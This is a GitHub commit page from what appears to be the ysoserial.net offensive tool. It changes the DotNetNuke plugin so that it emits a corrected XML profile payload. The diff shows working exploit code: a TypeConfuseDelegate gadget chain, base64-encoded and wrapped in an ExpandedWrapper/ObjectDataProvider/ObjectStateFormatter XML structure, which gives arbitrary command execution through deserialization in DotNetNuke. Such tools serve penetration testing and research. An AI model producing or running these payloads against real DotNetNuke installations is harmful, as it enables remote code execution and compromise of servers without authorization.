Skip to content
Permalink
Browse files

Fixed payload mode run_command.

  • Loading branch information...
GlitchWitchIO committed Nov 12, 2018
1 parent a4e56a0 commit 8001f0ebd0b169a5c6bb8424363b761c38c72bdf
Showing with 3 additions and 3 deletions.
  1. +3 −3 ysoserial/Plugins/DotNetNukePlugin.cs
@@ -64,9 +64,9 @@ public object Run(string[] args)
{
byte[] osf = (byte[]) new TypeConfuseDelegateGenerator().Generate(command, "ObjectStateFormatter", false);
string b64encoded = Convert.ToBase64String(osf);
string prefix = @"<profile><item key=""foo"" type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version = 4.0.0.0, Culture = neutral, PublicKeyToken = b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><ExpandedWrapperOfObjectStateFormatterObjectDataProvider xmlns:xsd="" [http://www.w3.org/2001/XMLSchema](http://www.w3.org/2001/XMLSchema) "" xmlns:xsi="" [http://www.w3.org/2001/XMLSchema-instance](http://www.w3.org/2001/XMLSchema-instance) ""><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xsi:type=""xsd:string"">";
string suffix = @"</anyType></MethodParameters><ObjectInstance xsi:type=""ObjectStateFormatter""></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>";
payload = prefix + b64encoded + suffix;
string prefix = @"<profile><item key=""key"" type=""System.Data.Services.Internal.ExpandedWrapper`2[[System.Web.UI.ObjectStateFormatter, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""><ExpandedWrapperOfObjectStateFormatterObjectDataProvider><ProjectedProperty0><ObjectInstance p3:type=""ObjectStateFormatter"" xmlns:p3=""http://www.w3.org/2001/XMLSchema-instance"" /><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:q1=""http://www.w3.org/2001/XMLSchema"" p5:type=""q1:string"" xmlns:p5=""http://www.w3.org/2001/XMLSchema-instance"">";
string suffix = @"</anyType></MethodParameters></ProjectedProperty0></ExpandedWrapperOfObjectStateFormatterObjectDataProvider></item></profile>";
payload = prefix + b64encoded + suffix;
}
else
{

0 comments on commit 8001f0e

Please sign in to comment.
You can’t perform that action at this time.